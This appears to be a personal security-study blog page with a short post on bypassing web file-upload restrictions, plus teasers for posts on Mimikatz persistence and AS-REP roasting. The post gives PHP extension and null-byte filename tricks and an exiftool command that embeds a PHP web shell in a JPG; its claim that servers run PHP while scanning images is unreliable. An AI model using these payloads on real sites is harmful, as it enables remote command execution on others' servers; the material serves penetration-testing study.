Josh Nutt

IT professional with 5+ years of experience, mostly building automation with PowerShell.

Currently studying Infrastructure as Code, Cyber Security, and Azure. Also working on CRTO and CRTP certifications.

When Im not studying Im probably hiking or playing Age of Empires 2.

Bypassing Upload Restrictions

less than 1 minute read

PHP has multiple alternative extensions:

phtml, .php, .php3, .php4, .php5, and .inc

It might be possible to upload and execute a .php file simply by renaming it file.php.jpg or file.PHp.

Add a null byte at the end

cp payload.php payload.php%00.jpg

Put a payload inside a jpg file, into the exgif data. Most web servers scan the file, and when it scans the file it executes the php data in the exgif file.

Use exiftool

exiftool -Comment="<?php system($_GET['cmd']); ?>" pic.jpg

Share on

Twitter Facebook LinkedIn

Constrained Delegation - Cobalt Strike and PowerView

less than 1 minute read

While working on the CRTO lab I wanted to try using PowerShell to find Constrained Delegation like I did in the CRTP course. They used PowerView, so I figur...

Persistence With DSRM And Mimikatz

1 minute read

We have domain admin, lets really sink our hook in and ensure persistence.

AS-REP Roast: PowerShell

less than 1 minute read

If a user’s UserAccountControl settings have Do Not Require Kerberos preauthentication enabled it is possible to grab user’s crackable AS-REP and brute-force...

Encountering Kerberos Encryption Types

1 minute read

While working on the CRTO course I ran into a hash that I couldn’t crack with Hashcat. Instead returning an error indicating the hash is invalid.

Josh Nutt

Share on

You may also enjoy

Constrained Delegation - Cobalt Strike and PowerView

Persistence With DSRM And Mimikatz

AS-REP Roast: PowerShell

Encountering Kerberos Encryption Types